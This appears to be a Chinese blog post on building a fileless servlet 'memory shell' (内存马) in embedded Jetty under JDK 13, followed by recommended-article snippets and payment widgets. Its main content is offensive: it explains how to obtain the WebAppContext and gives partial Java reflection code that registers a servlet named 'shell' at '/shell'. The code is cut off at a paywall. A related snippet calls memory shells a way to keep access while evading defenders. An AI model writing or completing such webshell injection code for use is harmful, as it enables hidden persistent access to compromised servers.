高版本jdk下jetty servlet型内存马编写

Jetty Servlet内存马在高版本JDK下的实现
最新推荐文章于 2025-10-13 10:49:46 发布
原创 最新推荐文章于 2025-10-13 10:49:46 发布 · 2.3k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#servlet #java #jetty #web安全

本文探讨了在SpringBoot + embedded Jetty 9.4.48.v20220622及JDK 13环境下,如何编写Jetty Servlet型内存马。主要介绍了两种方法:1) 通过request获取webappcontext,包括传统方式和通过Thread获取WebAppClassLoader;2) 通过MBean获取webappcontext时遇到的问题及其解决方法。同时提到了参考文献用于深入研究。

测试环境为springboot + embeded jetty jetty-9.4.48.v20220622,jdk为13。

jetty内存马的研究类同于tomcat,获取webappcontext通常有两种方式:

一、通过request获取

传统方式是在有request对象时,通过它获取webappcontext对象

在这里插入图片描述
可以看到得到的对象为webappcontext类中嵌入类context(该类不能在系统初始化完成之后再添加listener、filter和servlet。

还有一种方法是通过Thread类获取thread对象,看能不能找到WebAppClassLoader,从而获取webappcontext对象。

在这里插入图片描述
classloader不为空的都是appclassloader,并没有webappclassloader。但是在非嵌入式jetty中确含有webappclassloaer(有兴趣的小伙伴可以分析一下具体原因)。

在这里插入图片描述
在获取了webappclassloader的基础上很容易就能够写出内存马。

        String servletName = "shell";
        String urlPattern = "/shell";

        Method threadMethod = Class.forName("java.lang.Thread").getDeclaredMethod("getThreads");
        threadMethod.setAccessible(true);
        Thread[] threads = (Thread[]) threadMethod.invoke(null);
        ClassLoader threadClassLoader = null;
        for (Thread thread : threads) {
   
   
            threadClassLoader = thread.getContextClassLoader();
            if (threadClassLoader != null) {
   
   
                
                if (threadClassLoader.toString().contains("WebAppClassLoader")) {
   
   
                    Field fieldContext = threadClassLoader.getClass().getDeclaredField("_context");
                    fieldContext.setAccessible(true);
                    Object webAppContext = fieldContext.get(threadClassLoader);
                    Field fieldServletHandler = webAppContext.getClass().getSuperclass().getDeclaredField("_servletHandler");
                    fieldServletHandler.setAccessible(true);
                    Object servletHandler = fieldServletHandler.get(webAppContext);

                    //check servlet if exist
                    Field fieldServlets = servletHandler.getClass().getDeclaredField(
最低0.47元/天 解锁文章
Spring Boot进阶(20):「打造高性能Web应用」——使用Jetty容器配置Spring Boot
**My Coding Family**
03-10 6146
SpringBoot如何配置Jetty容器,赶紧来学,手把手教你~~
jetty-jdk7使用版本
01-02
支持jdk7的jetty服务器,本想免费下载的,但没有分数为0的选项,点个1分,意思意思
Java内存简单实现
派大星的博客
12-04 2834
Java内存
Servlet内存
最新发布
ubaichu的博客
10-13 214
tomcat的加载部分在:ContextConfig.configureContext(WebXml webxml),webxml实参变量包含我们在web.xml中定义的HelloServlet和映射路径信息。context获取:context是StandardContext,HttpServletRequest.getServletContext.context.context。两行添加进容器的代码:一个是向容器上下文中添加我们的Servlet,一个是向容器声明Servlet和URL的映射关系。
jetty各版本与JDK的对应关系
热门推荐
gsls200808的专栏
03-02 1万+
之前被Eclipse官网的JDK对应列表坑过一次,今天又被jetty官网的JDK对应列表坑了一回                               官方的列表地址:http://www.eclipse.org/jetty/about.html官方列表如下VersionsVersionYearHomeJVMProtocolsServletJSPStatus9.32015Eclipse1.8...
linux jetty9 内存配置,Linux下Jetty9安装部署
weixin_42571738的博客
05-03 354
在网上看Jetty觉得很NB就部署一下玩玩,长一下经验。下载Jetty9地址http://www.eclipse.org/jetty/previousversions.html这里可以挑自己版本,我这里选的9版本这里我把jetty 放在./usr/local/jetty目录下 下载好的上传就行了然后 tar解压tar -xvf jetty-distribution-9.4.6.v20170531...
jetty 适合jdk1.8用的服务器
12-24
jetty 是一款轻量级的web服务器,相比Tomcat版本更复杂,每个jdk的版本使用的jetty都可能不一样,9.4的版本适合jdk1.8使用
Java如何使用Jetty实现嵌入式的Servlet容器
08-25
首先需要下载Jetty的最新版本,当前最新版本是9.1.2,可以从官网下载jetty-distribution-9.1.2.v20140210.zip。 第二步:引入Jar包 在Java项目中要实现servlet容器,需要引入以下jar包: * jetty-servlet-9.1.2.v...
解决jetty8内存溢出版本
03-05
Jetty 8是一款轻量级、高性能的Java Web服务器和Servlet容器,被广泛用于开发、测试和部署Web应用程序。在处理高并发或者大应用时,内存管理是关键问题,而"内存溢出"则是一个常见的性能瓶颈。内存溢出(Out of ...
支持JDK7的Jetty服务器使用教程与资源下载
Jetty是一个开源的Servlet容器,它用于提供Web服务器和Servlet容器的功能,以支持Java语言编写Web应用。Jetty以其轻量级、易于扩展以及支持异步处理等特性而被广泛应用于需要高性能的场景中。在JDK7的背景下,意味...
jetty-runner适用于JDK1.7
11-09
IDEA jetty-runner 插件 直接解压到idea安装目录的plugins目录下重启IDEA即可
eclipse_jetty9离线插件
09-01
提供给新人下载安装插件,eclipse jetty 9 版本离线插件下载安装,降低调整一下所需积分有需要,后续大家有需要留言
jetty--jetty所需要的jdk版本问题
nupt_Wang的专栏
12-20 9256
错误: UnsupportedClassVersionError: org/eclipse/jetty/servlet/listener/ELContextCleaner : Unsupported major.minor version 52.0 在maven中使用默认version 也就是最好的jetty时候,会报异常,自己的jdk是1.6,换成了1.8之后完美解决 下面是搜到的 j
JDK15无法使用jetty插件的问题,换成JDK1.8
Eisfrog的博客
12-23 298
jdk15不行的jdk1.8说不定可以
jetty升级到9.4.48.v20220622后xml中配置的org.eclipse.jetty.server.Request.maxFormContentSize失效
lvkun0223的博客
02-10 1505
jetty升级到9.4.48.v20220622后xml中配置的org.eclipse.jetty.server.Request.maxFormContentSize失效
用 Goby 通过反序列化漏洞一键打入内存【利用篇】
m0_46699477的博客
01-16 1309
Goby 使用者无需任何配置,就可以一键打入内存
java内存原理和检测方法
m0_67170526的博客
04-02 1761
内存为现在的主流webshell技术之一, 一般存在于JAVA环境, ASPX环境也有内存,但是PHP没有(有不死,类似条件竞争)内存主要用途是做权限维持,特点是无文件,代码保存在内存中,导致值守人员不太好进行排查。
camel jetty获取HttpServletRequest
zhuzi51的专栏
06-11 1081
楔子 camel jetty 获取 HttpServletRequest demo <routeContext id="sysHttp" xmlns="http://camel.apache.org/schema/spring"> <route> <from uri="jetty:http://0.0.0.0/myapp/1.jpg?sessionSuppo...
升级Eclipse的几个要点
beeworkshop的博客
08-09 234
1. 取消无效更新站点 2. 不试图连接所有的网站下载更新包
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值